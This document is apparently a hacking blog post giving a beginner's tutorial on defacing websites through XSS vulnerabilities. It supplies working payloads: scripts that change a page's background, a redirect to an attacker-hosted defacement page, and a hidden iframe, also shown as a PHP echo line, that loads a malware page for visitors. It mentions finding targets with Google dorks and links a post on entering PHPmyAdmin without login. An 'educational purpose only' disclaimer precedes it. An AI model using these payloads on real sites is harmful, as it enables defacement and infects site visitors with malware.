Today i am gonna teach you how to deface the sites which has the XSS vulnerability .
NOTE : Never implement this technique. I am just explaining it for educational purpose only.
Defacing is one of the most common thing when the hacker found the vulnerability in website.
Defacing is changing the content the website to Hacker content.
Most of time, attacker use this technique to inform about the vulnerability to Admin.
But it's bad idea..!
i have some easiest methods to deface the Xss vuln sites .. i will be teaching u one by one .
1 - Script for changing the background Color of a website:
<script>document.body.bgColor="red";</script>
use this in your target website as
http://www.targetwebsite.com/<script>document.body.bgColor="red";</script>
2 - Script for chaning the background image of a website:
<script>document.body.background="http://your_image.jpg/";</script>
3 - Defacement Page with Pastehtml:
First of all upload some defacement page(html) to pastehtml.com and get the link.
When you find a XSS vulnerable site, then insert the script as :
<script>window.location="http://www.pastehtml.com/Your_Defacement_link";</script>
This script will redirect the page to your pastehtml defacement page.
Note: You can deface only persistent XSS vulnerable sites.
4 - Defacing with iframe Injection
What is an IFrame Injection?
Using IFrame tag, The Attackers injects the malware contain website(links)
using Cross site Scripting in popular websites.
So if the usual visitors of that popular sites opens the website,
it will redirect to malware contain website.
Malware will be loaded to your computer, now you are infected .
What an attacker can do with Iframe Injection?
Using Iframe Injection, an attacker can inject advertisements inside any other websites,
insert malware infected site links, redirect to malware infected sites and more.
Iframe Injection Tutorial:
1.First of all attacker will find the Vulnerable websites using google dorks.
2. They test the vulnerability by inserting some iframe tag using the url.
3. then insert the Malicious Iframe code inside the webpage.
For Example:
he can insert this code using the url:
Code:
<iframe src=”http://malwarewebpages/web.html” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>
For php webpages:
echo “<iframe src=\”http://malwarewebpages/web.html\” width=1 height=1 style=\”visibility:hidden;position:absolute\”></iframe>”;
I have just given some easy method only to deface the XSS affected page ..
It wil be NOOB friendly .. Still there are more methods to deface it..
Related Posts
Secret c0Des for ANDROID Devices
11 Jun 20141ASSALAM-O-ALIKUM , Here I am with several secret hack codes for Android Devices. These android hac...Read more »
3 Hidden Modes in Android Mobile phones
11 Jun 20142Assalam-o-Alikum Guys, We havent posted any thing since 1 or 2 months! So now I am back and wi...Read more »
How to flip Facebook Status Update Upside Down
22 Apr 20140How to flip fb status upside down Go to the website www.fliptext.org.In the upper field type ...Read more »
How to change facebook username after limit
16 Apr 20140Many people ask that can they change their username after it's changing limit?The answer is = YES S...Read more »
How to access PHPmyAdmin without login and DEFACE it
14 Apr 20141How to get access into PHPmyAdmin without login and DEFACE it just put the dork and open any site n ...Read more »
Subscribe to:
Post Comments (Atom)
Post a Comment
Click to see the code!
To insert emoticon you must added at least one space before the code.